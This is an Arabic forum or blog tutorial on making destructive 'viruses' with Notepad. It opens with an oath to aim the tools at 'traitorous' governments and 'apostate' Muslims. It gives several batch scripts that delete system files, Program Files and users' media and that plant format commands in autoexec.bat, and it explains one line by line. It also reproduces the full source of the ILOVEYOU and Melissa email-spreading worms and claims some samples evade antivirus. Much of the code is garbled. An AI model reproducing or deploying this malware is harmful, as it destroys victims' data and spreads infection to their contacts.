هذه ليست فيروسات, بل هي آوامر مدمره تدمر الجهاز

وهي شبيهة جدا بلفيروسات ونستطيع تسميتها بلفيروسات
وأرجو من جميع الأخوه الخبراء إذا كان الموضوع ناقصا أو فيه نوع من الخطأ أن لا يبخلو علينا بلنقدالبناء.. والتصليح
عند البدء يجب علينا أن نتعاهد على هذا القسم
أقسم بلله العظيم ألا أستخدم هذه الطرق لإلحاق الأذى بلمسلمين بدون حق شرعي

وأقسم بلله العظيم أن ألا أستخدم هذه الطرق بهدف الإنتقام وتصفيه الحسابات وخاصه بين الشباب المراهقين بدون حق شرعي
وأقسم بلله العظيم أن أحرص على أن أستخدم هذه الطرق لإلحاق الأذى

بلحكومات الإسلاميه والعربيه الخائنه والتابعه لأمريكا وإسرائيل وماشابه ذلك

وأقسم بلله العظيم أن أستخدم هذه الطرق ضد المسلمين الخونه والمرتدين

الذين يكيدون للإسلام والمسلمين وماشابه ذلك

وأن ينحصر إستخدامي لهذه الطرق بهدف خدمه الإسلام والمسلمين
وأنا أبرء ذمتي أمام الله بمن ينكث بهذا القسم
والله خير الشاهدين

آلان نبدأ

إياكم أن تقومو بتجربتها على أجهزتكم
إذهب إلى Notepad وقم بنسخ هذه الأكواد

وأتبع التعليمات خطوه بخطوه

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat

وبعد لصقه في المفكرة

واحفظه بهذا الاسم

AUTOEXEC.BAT

وبعدين راح ينشأ لك فيروس
إنتهى

ولا تفكر تفتح الملف بعد صنعه
********************************************************
وقم بنسخ هذا الكود في المفكرة

del C:windows *.ini *.exe *.scr *.txt *.log
del C:windowssystem32 *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys*.dll
del C:windowssystem *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll

وبعد لصقه في المفكرة

واحفظه بهذا الاسم

maker.bat

و بهذا يكون الأمر قد أنتها في صنع الفيروس

إنتهى

ولاتفكر تفتح الملف بعد صنعه

************************************************** ******
عمل فورمات C,D,E,F والطابعه

وقم بنسخ هذا الكود في المفكرة

callattrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar

وبعد لصقه في المفكرة

واحفظه بهذا الاسم

not.bat

إنتهى

ولا تفكر تفتح الملف بعد صنعه

**************************************************
عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز

وقم بنسخ هذا الكود في المفكرة

callattrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar
c:\windows\rundll.exe user.exe,exitwindowsexec

وبعدلصقه في المفكرة

واحفظه بهذا الاسم

not.bat

إنتهى

ولا تفكر تفتح الملف بعد صنعه

**************************************************
عمل فورمات C,D,E,F والطابعه وقفل الجهاز

وقم بنسخ هذا الكود في المفكرة

call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar
c:\windows\rundll32.exe user.exe,exitwindows

وبعدلصقه في المفكرة

واحفظه بهذا الاسم

not.bat

إنتهى

ولاتفكر تفتح الملف بعد صنعه

**************************************************
عمل فورمات للجهاز فورا

وقم بنسخ هذا الكود في المفكرة

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat

وبعدلصقه في المفكرة

واحفظه بهذا الاسم

not.bat

إنتهى

ولاتفكر تفتح الملف بعد صنعه
************************************************** ***************************************************
اهم فايروس مدمر

وقم بنسخ هذا الكود في المفكرة

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat

وبعد لصقه في المفكرة

واحفظه بهذا الاسم

not.bat

إنتهى

ولاتفكر تفتح الملف بعد صنعه
هذا فايرس بصراحه حقير وهذا الرابط يشرح لكم

http://www.youtube.com/watch?v=EiHHk...eature=related

وهذا الكود

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

ثانيا :اعمل save ب اسم whatever.bat

ثالثا: اعمل all files فى save as type
إنتهى

************************************************** ****

ملاحظه هاااااامه جدا جدا جدا
معظم هذه الفيروسات يتم إكتشافها من قبل المضاد للفيروسات
ولكن هذه بعض الفيروسات التي لا يستطيع المضاد الإمساك بها والمثال على هذه الفيروسات
عمل فورمات C,D,E,F

call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
echo as ansar
echo as ansar
c:windowsrundll.exe user.exe,exitwindowsexec

إنتهى

************************************************** *********

عمل فورمات C,D,E,F

call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
echo as ansar
echo as ansar
c:windowsrundll32.exe user.exe,exitwindows

إنتهى

************************************************** *********

تدمير الوندوز وحذف الملفات بعد التشغيل مباشره

@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo as ansar

إنتهى

************************************************** *********

قتل الوندوز وحذف كل الملفات بعد اول اعادةتشغيل للجهاز

call attrib -h -r c:autoexec.bat >nul

@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo as ansar

إنتهى

************************************************** *********

عمل فورمات للجهاز فورا

code:--------------------------------------------------------------------------------echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul>>c:autoexec.bat--------------------------------------------------------------------------------

إنتهى

************************************************** *********

اهم فورمات البنسبه الي

echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat

إنتهى

************************************************** *********

جميع الفيروسات السابقه تحفظ على النوت باد بإمتداد bat

مثال: limeware.bat

Soso.bat

FBI.bat

هذهأمثله ولكم حريه إختيار الإسم

وأكرر إياكم فتح هذه الفيروسات على أجهزتكم

إياكم أن تقومو بتجربتها على أجهزتكم

************************************************** *********

الفايروسات القويه الحب
كما تعلمنا سابقا

rem barok -loveletter(vbe) <i hate go to school>rem by: spyder / ispyder@mail.com / @grammersoft group /
Manila,Philippines
On Error Resume Next
Dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
Sub main()
On Error Resume Next
Dim wscr,rr
Set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\oftware\icrosof t\indows Scripting
Host\ettings\imeout")
If (rr>=1) Then
wscr.RegWrite "HKEY_CURRENT_USER\oftware\icrosoft\indows Scripting
Host\ettings\imeout",0,"REG_DWORD"
End If
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\SKernel32.vbs")
c.Copy(dirwin&"\in32DLL.vbs")
c.Copy(dirsystem&"\OVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
End Sub
Sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\un\SKernel32
",dirsystem&"\SKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\unServices\i
n32DLL",dirwin&"\in32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\oftware\icrosof t\nternet
Explorer\ownload Directory")
If (downread="") Then
downread="c:\
End If
If (fileexist(dirsystem&"\inFAT32.exe")=1) Then
Randomize
num = Int((4 * Rnd) + 1)
If num = 1 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
ElseIf num = 2 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
ElseIf num = 3 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
ElseIf num = 4 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
End If
End If
If (fileexist(downread&"\IN-BUGSFIX.exe")=0) Then
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\un\IN-BUGSFI
X",downread&"\IN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\oftware\icrosoft\nternet Explorer\ain\tart
Page","about_:blank"
End If
End Sub
Sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType=3 Then
folderlist(d.path&"\)
End If
Next
listadriv = s
End Sub
Sub infectfiles(folderspec)
On Error Resume Next
Dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
ext=fso.GetExtensionName(f1.path)
ext=LCase(ext)
s=LCase(f1.Name)
If (ext="vbs") Or (ext="vbe") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
ElseIf(ext="js")Or (ext="jse") Or (ext="css") Or (ext="wsh") Or(ext="sct")
Or (ext="hta") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
bname=fso.GetBaseName(f1.path)
Set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\&bname&".vbs")
fso.DeleteFile(f1.path)
ElseIf(ext="jpg") Or (ext="jpeg") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
Set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
ElseIf(ext="mp3") Or (ext="mp2") Then
Set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.Close
Set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
End If
If (eq<>folderspec) Then
If (s="mirc32.exe") Or (s="mlink32.exe") Or(s="mirc.ini") Or
(s="script.ini") Or (s="mirc.hlp") Then
Set scriptini=fso.CreateTextFile(folderspec&"\cript.in i")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com/"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{
scriptini.WriteLine "n1= /if ( $nick == $me ) {halt }
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\OVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}
scriptini.Close
eq=folderspec
End If
End If
Next
End Sub
Sub folderlist(folderspec)
On Error Resume Next
Dim f,f1,sf
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
infectfiles(f1.path)
folderlist(f1.path)
Next
End Sub
Sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
End Sub
Function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
End Function
Function fileexist(filespec)
On Error Resume Next
Dim msg
If (fso.FileExists(filespec)) Then
msg = 0
Else
msg = 1
End If
fileexist = msg
End Function
Function folderexist(folderspec)
On Error Resume Next
Dim msg
If (fso.GetFolderExists(folderspec)) Then
msg = 0
Else
msg = 1
End If
fileexist = msg
End Function
Sub spreadtoemail()
On Error Resume Next
Dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
Set regedit=CreateObject("WScript.Shell")
Set out=WScript.CreateObject("Outlook.Application")
Set mapi=out.GetNameSpace("MAPI")
For ctrlists=1 To mapi.AddressLists.Count
Set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\oftware\ic rosoft\AB\&a)
If (regv="") Then
regv=1
End If
If (Int(a.AddressEntries.Count)>Int(regv)) Then
For ctrentries=1 To a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\oftware\i crosoft\AB\&malead)
If (regad="") Then
Set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming fromme."
male.Attachments.Add(dirsystem&"\OVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&malead,1," REG_DWORD"
End If
x=x+1
Next
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&a,a.Addres sEntries.Count
Else
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&a,a.Addres sEntries.Count
End If
Next
Set out=Nothing
Set mapi=Nothing
End Sub
Sub html
On Error Resume Next
Dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER -HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveXControl<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){ar wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.re sizeTo(wi,hi);}&vbcrlf&_
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="setfso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39 ))"&vbcrlf&_
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(3 4))"&vbcrlf&_
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(9 2))"&vbcrlf&_
"setwri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf&_
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@))then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initializeActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,Chr(35)&Chr(45)&Chr(35),"'")
dt1=replace(dt1,Chr(64)&Chr(45)&Chr(64),"""")
dt4=replace(dt1,Chr(63)&Chr(45)&Chr(63),"/")
dt5=replace(dt4,Chr(94)&Chr(45)&Chr(94),"\)
dt2=replace(dta2,Chr(35)&Chr(45)&Chr(35),"'")
dt2=replace(dt2,Chr(64)&Chr(45)&Chr(64),"""")
dt3=replace(dt2,Chr(63)&Chr(45)&Chr(63),"/")
dt6=replace(dt3,Chr(94)&Chr(45)&Chr(94),"\)
Set fso=CreateObject("Scripting.FileSystemObject")
Set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=UBound(lines)
For n=0 To UBound(lines)
lines(n)=replace(lines(n),"'",Chr(91)+Chr(45)+Chr( 91))
lines(n)=replace(lines(n),"""",Chr(93)+Chr(45)+Chr (93))
lines(n)=replace(lines(n),"\,Chr(37)+Chr(45)+Chr(3 7))
If (l1=n) Then
lines(n)=Chr(34)+lines(n)+Chr(34)
Else
lines(n)=Chr(34)+lines(n)+Chr(34)&"&vbcrlf& _"
End If
Next
Set b=fso.CreateTextFile(dirsystem+"\OVE-LETTER-FOR-YOU.HTM")
b.Close
Set d=fso.OpenTextFile(dirsystem+"\OVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.Close
End Sub

************************************************** *********

فايروسمليسيا فايروس خطير

Private Sub AutoOpen() On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\ord\e curity","Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed =False
System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\.0\ord\ecurity","Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\, "Melissa?") <>"... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don'tshow anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\, "Melissa?") ="... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name,"Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False)Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points,plustriple-word-score, plus fifty points for using all my letters.Game's over. I'moutta here."
End Sub

************************************************** *********
الأحد، 6 أبريل 2014
بواسطة Unknown
تصنيف :
سوف نقوم الآن بتعلم تصميم الفيروسات بواسطة notepad
إذا أردتم تصميم فيروس بهذا النوع من التصميمات يجب أن تعرفوا كيف تضعون الأكواد التي سوف أعطيها لكم و هي عن طريق فتح برنامج notepad وكتابة الكود فيه ثم حفظه بأي اسم تريده ولكن بامتداد .bat
و الآن كل ما عليكم هو أن تضعوا الكود الذي ترغبون فيه ونسخه إلى notepad و تحفظه و بعدها يكون الفيروس قد أنشئ ولكن أحذر كما تعرفون لا تفتحوا الملف وإلا ...... وقد أعذر من أنذر

نبدا بسم الله :

الكود الأول :
---------------------


كود:
@Echo off 
c: 
cd %WinDir%\System\ 
deltree /y *.dll 
cd\ 
deltree /y *.sys
الـتوضـــــــــــتيح :
* بعد أن قمت بوضع الكود و حفظه بامتداد .bat فأنت هكذا تكون قد قمت بعمل فيروس و سوف تلحظ أن شكل الأيقونة قد أصبح بهذا الشكل :

* هذا الفيروس يقوم على مسح كل ملفات dll و sys من system وهذا ما سوف نلحظه بالنظر إلى الكود و به سوف نجد أنه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين و يمكن ملاحظة شيء آخر و هو كون الكمبيوتر يمسح الملفات من system و سوف نجد فى أول الكود الأمر الخاص بذلك فسوف تجد أنه قد أعطى له الأمر بالذهاب إلى c: و كما أعطاه الأمر بالذهاب لملفات الوندوز عندما أصدرنا له الأمر windir ثم أخبرناه أن الأوامر التالية يجب أن تكون داخل ملف system و هو موجود ضمن ملفات الويندوز
* بعد أن فهمنا هذه الأوامر ..... هل هناك من يستطيع الإجابة على سؤالي و هو : هل يمكننا تعديل هذا الكود ؟!!

لن ادعكم تفكرون طويلا فى الأجابة سوف أجيب بكل بساطة عن السؤال و هو يمكننا أن نغير أى شئ قد فهمناه جيدا لذا يمكننا أن نغير هذا الكود قليلا وسأخبركم عما هو يمكننا أن نغيره و طبعا أنتم تعرفون المكان الذي يمكننا أن نغيره في الكود فيمكننا أن نغير نوعية الملفات التى سيقوم بمسحها أو يمكننا زيادتها كما يمكننا أن نغير المكان الذى سوف يوجد فيه فمثلا هناك يوجد أنواع لأنظمة التشغيل فهناك من يضع مثلا ويندوز 98 و هناك من يضع Xp لذا يمكننا أن نغير اتجاه الفيروس إلى d:
مثال توضيحى :
أنا الآن أريد أن أمزح مع أحد و فى نفس الوقت أريد أن اعلمه درس فيمكنني أن أصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما أننى أريد أن أمسح جميع الملفات التي امتددها *.mp3 و جميع امتدادت الملفات الخاصة بالأفلام و التي امتدادها *.asf و التى توجد في E: كل ما علينا هو تعديل الكود ليصبح هكذا:

كود:
@Echo off 
e: 
deltree /y *.jpg 
cd\ 
deltree /y *.mp3 
cd\ 
deltree /y *.asf
ما رأيكم في الفيروس الجديد أتمنى أن يعجبكم أما الآن ندخل في الكود الثاني:
----------------
الكود الثانى :
--------------
كود:
echo off@ 
cls 
call attrib -h -r c:\autoexec.bat >nul 
echo @echo off >c:\autoexec.bat 
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat 
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat 
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat 
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat 
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
الـتوضــــــــــيح :
الفيروس السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر
نبدا بتوضيح الكود : فكما نرى فى الكود اول سطر مجرد فائدته مسح الشاشة من أي أمر أو تعليق مسبق حتى يجعل عمل هذا الفيروس هو الوحيد
بعدها سوف نجد مجموعة من السطور هي تقريبا مكرره فكرتها وليس مكرر عملها ولكن يمكننا أن نوضح انه هناك 3 أكود منفصلة هي الفكرة الأساسيه و هي ما سوف نوضحه
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat

 يعطي هذا المود الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التي تنزل على الجهاز و نلاحظ تكراره في مسح الويندوز فى الكود
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
ولكنه اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك أعطى أمر نسخ لهذين الأمرين حتى يمكننا استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
اما بعد ذلك فهو أعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
